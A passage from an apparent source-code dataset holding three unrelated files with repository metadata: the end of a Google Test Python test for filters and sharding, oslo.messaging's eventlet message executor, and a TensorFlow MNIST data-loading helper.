'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS) self.RunAndVerify('*-FooTest.Abc:BazTest.*', [ 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', ] + DEATH_TESTS + PARAM_TESTS) self.RunAndVerify('BarTest.*-BarTest.TestOne', [ 'BarTest.TestTwo', 'BarTest.TestThree', ]) # Tests without leading '*'. self.RunAndVerify('-FooTest.Abc:FooTest.Xyz:BazTest.*', [ 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', ] + DEATH_TESTS + PARAM_TESTS) # Value parameterized tests. self.RunAndVerify('*/*', PARAM_TESTS) # Value parameterized tests filtering by the sequence name. self.RunAndVerify('SeqP/*', [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', ]) # Value parameterized tests filtering by the test name. self.RunAndVerify('*/0', [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestY/0', 'SeqQ/ParamTest.TestX/0', 'SeqQ/ParamTest.TestY/0', ]) def testFlagOverridesEnvVar(self): """Tests that the filter flag overrides the filtering env. variable.""" SetEnvVar(FILTER_ENV_VAR, 'Foo*') args = ['--%s=%s' % (FILTER_FLAG, '*One')] tests_run = RunAndExtractTestList(args)[0] SetEnvVar(FILTER_ENV_VAR, None) self.AssertSetEqual(tests_run, ['BarTest.TestOne', 'BazTest.TestOne']) def testShardStatusFileIsCreated(self): """Tests that the shard file is created if specified in the environment.""" shard_status_file = os.path.join(gtest_test_utils.GetTempDir(), 'shard_status_file') self.assert_(not os.path.exists(shard_status_file)) extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file} try: InvokeWithModifiedEnv(extra_env, RunAndReturnOutput) finally: self.assert_(os.path.exists(shard_status_file)) os.remove(shard_status_file) def testShardStatusFileIsCreatedWithListTests(self): """Tests that the shard file is created with the "list_tests" flag.""" shard_status_file = os.path.join(gtest_test_utils.GetTempDir(), 'shard_status_file2') self.assert_(not os.path.exists(shard_status_file)) extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file} try: output = InvokeWithModifiedEnv(extra_env, RunAndReturnOutput, [LIST_TESTS_FLAG]) finally: # This assertion ensures that Google Test enumerated the tests as # opposed to running them. self.assert_('[==========]' not in output, 'Unexpected output during test enumeration.\n' 'Please ensure that LIST_TESTS_FLAG is assigned the\n' 'correct flag value for listing Google Test tests.') self.assert_(os.path.exists(shard_status_file)) os.remove(shard_status_file) if SUPPORTS_DEATH_TESTS: def testShardingWorksWithDeathTests(self): """Tests integration with death tests and sharding.""" gtest_filter = 'HasDeathTest.*:SeqP/*' expected_tests = [ 'HasDeathTest.Test1', 'HasDeathTest.Test2', 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', ] for flag in ['--gtest_death_test_style=threadsafe', '--gtest_death_test_style=fast']: self.RunAndVerifyWithSharding(gtest_filter, 3, expected_tests, check_exit_0=True, args=[flag]) self.RunAndVerifyWithSharding(gtest_filter, 5, expected_tests, check_exit_0=True, args=[flag]) if __name__ == '__main__': gtest_test_utils.Main()
bsd-3-clause
akash1808/oslo.messaging
oslo_messaging/_executors/impl_eventlet.py
2
3805
# Copyright 2013 Red Hat, Inc. # Copyright 2013 New Dream Network, LLC (DreamHost) # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging import sys import eventlet from eventlet.green import threading as greenthreading from eventlet import greenpool import greenlet from oslo_utils import excutils from oslo_messaging._executors import base from oslo_messaging import localcontext LOG = logging.getLogger(__name__) def spawn_with(ctxt, pool): """This is the equivalent of a with statement but with the content of the BLOCK statement executed into a greenthread exception path grab from: http://www.python.org/dev/peps/pep-0343/ """ def complete(thread, exit): exc = True try: try: thread.wait() except Exception: exc = False if not exit(*sys.exc_info()): raise finally: if exc: exit(None, None, None) callback = ctxt.__enter__() thread = pool.spawn(callback) thread.link(complete, ctxt.__exit__) return thread class EventletExecutor(base.PooledExecutorBase): """A message executor which integrates with eventlet. This is an executor which polls for incoming messages from a greenthread and dispatches each message in its own greenthread. The stop() method kills the message polling greenthread and the wait() method waits for all message dispatch greenthreads to complete. """ def __init__(self, conf, listener, dispatcher): super(EventletExecutor, self).__init__(conf, listener, dispatcher) self._thread = None self._greenpool = greenpool.GreenPool(self.conf.rpc_thread_pool_size) self._running = False if not isinstance(localcontext._STORE, greenthreading.local): LOG.debug('eventlet executor in use but the threading module ' 'has not been monkeypatched or has been ' 'monkeypatched after the oslo.messaging library ' 'have been loaded. This will results in unpredictable ' 'behavior. In the future, we will raise a ' 'RuntimeException in this case.') def _dispatch(self, incoming): spawn_with(ctxt=self.dispatcher(incoming), pool=self._greenpool) def start(self): if self._thread is not None: return @excutils.forever_retry_uncaught_exceptions def _executor_thread(): try: while self._running: incoming = self.listener.poll() if incoming is not None: self._dispatch(incoming) except greenlet.GreenletExit: return self._running = True self._thread = eventlet.spawn(_executor_thread) def stop(self): if self._thread is None: return self._running = False self.listener.stop() self._thread.cancel() def wait(self): if self._thread is None: return self._greenpool.waitall() try: self._thread.wait() except greenlet.GreenletExit: pass self._thread = None
apache-2.0
adit-chandra/tensorflow
tensorflow/examples/saved_model/integration_tests/mnist_util.py
5
1945
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Convenience wrapper around Keras' MNIST and Fashion MNIST data.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow.compat.v2 as tf INPUT_SHAPE = (28, 28, 1) NUM_CLASSES = 10 def _load_random_data(num_train_and_test): return ((np.random.randint(0, 256, (num, 28, 28), dtype=np.uint8), np.random.randint(0, 10, (num,), dtype=np.int64)) for num in num_train_and_test) def load_reshaped_data(use_fashion_mnist=False, fake_tiny_data=False): """Returns MNIST or Fashion MNIST or fake train and test data.""" load = ((lambda: _load_random_data([16, 128])) if fake_tiny_data else tf.keras.datasets.fashion_mnist.load_data if use_fashion_mnist else tf.keras.datasets.mnist.load_data) (x_train, y_train), (x_test, y_test) = load() return ((_prepare_image(x_train), _prepare_label(y_train)), (_prepare_image(x_test), _prepare_label(y_test))) def _prepare_image(x): """Converts images to [n,h,w,c] format in range [0,1].""" return x[..., None].astype('float32') / 255. def _prepare_label(y): """Conerts labels to one-hot encoding.""" return tf.keras.utils.to_categorical(y, NUM_CLASSES)
apache-2.0